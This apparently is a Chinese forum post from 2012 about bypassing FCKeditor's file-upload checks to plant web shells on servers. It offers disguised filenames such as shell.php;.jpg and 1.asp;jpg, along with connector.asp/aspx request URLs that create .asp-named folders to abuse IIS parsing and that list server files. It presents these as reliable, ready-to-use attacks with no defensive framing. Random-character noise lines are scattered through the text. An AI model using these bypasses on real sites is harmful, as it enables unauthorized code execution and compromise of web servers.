很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
% U' z' V8 g$ X5 Z, ^
+ Q* X6 w0 O3 c- W: a+ |提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
) h1 O6 q$ u# T. l' C5 X! U. B4 ^4 `4 d0 Y( N5 E+ `; ?7 n
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。" J- B3 {9 t& F; f
( J: P e* I+ s突破建立文件夹:5 S7 [) @$ J- V5 q q- w! ?
4 j- u9 ]. I6 b, i( D0 T b: U' |3 j
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
/ z T- O% F) P1 U/ |
2 D$ u5 ^- s5 \. c5 f0 l; T参数:# r# V8 E6 [- j, m6 ?3 y) M
- V. ^8 P) R# \- `* W$ ]
当前目录名:CurrentFolder=/qing.asp& ?8 o3 b, g0 B1 e3 n
3 N. M! K# G: [- S$ \/ u新的目录名:NewFolderName=x.asp8 q5 W: ]# b: m! d6 v9 U0 p1 n- v
) u' v! j' i3 b% ?* ?- _. `. c* n9 Z
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
% s# ^9 q# n) N& Y- w! W4 _+ K5 _' X* K" Q' |* N1 {' ] q7 u
那么 x.asp 就已经建立生成了,此方法百试百灵!* q' j5 t) \# I' Y5 y
, A3 z. v3 `) F" b
新建文件夹参数 x.asp,基本都能搞定。/ Z, r/ m* ]3 K- _% h1 T
% r, r! ?0 C. x6 r( X+ H下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
, p- D+ I, C& q3 x V# l; y
5 w" ]* H& D+ Y, haspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
6 R! a( W! b* m3 a/ R) b& M
3 p& R' W% Y2 _6 E7 h& F& v获取文件列表
; q+ u$ b# e! a6 c aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
& G. ~" X0 P% z, t" O$ M$ R, r1 j. z' N6 ^/ d
|
发表于 2012-12-31 09:27:09
收藏
支持
反对